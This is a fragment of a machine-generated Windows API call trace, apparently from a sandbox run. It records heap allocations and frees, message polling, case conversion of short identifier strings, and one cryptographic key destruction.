[0260.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0260.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0260.086] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0260.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0260.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0260.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0260.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0260.087] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.087] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0260.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0260.087] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0260.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0260.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0260.088] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.089] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0260.089] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0260.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.089] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0260.089] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0260.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.089] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0260.089] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.089] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0260.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.089] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0260.089] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0260.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.090] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0260.090] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.090] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0260.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.090] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.090] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0260.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.090] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.090] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0260.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0260.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0260.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0260.091] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.091] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.091] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0260.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0260.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0260.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0260.091] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.091] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.091] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0260.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.096] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.096] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.096] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0260.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0260.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.098] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0260.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0260.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0260.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0260.098] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0260.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0260.098] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0260.098] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0260.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0260.098] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0260.098] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.098] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0260.099] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.099] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0260.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0260.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0260.099] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.099] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0260.099] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0260.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0260.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0260.099] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0260.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0260.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0260.100] CryptDestroyKey (hKey=0xaa57a0) returned 1 [0260.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0260.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0260.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0260.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0260.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0260.100] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0260.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0260.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0260.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0260.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0260.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0260.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0260.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.101] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0260.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0260.102] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0260.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0260.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0260.102] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0260.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0260.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0260.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0260.102] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0260.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0260.103] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.103] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0260.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0260.103] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0260.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa050 [0260.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0260.103] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0260.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0260.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.104] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0260.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 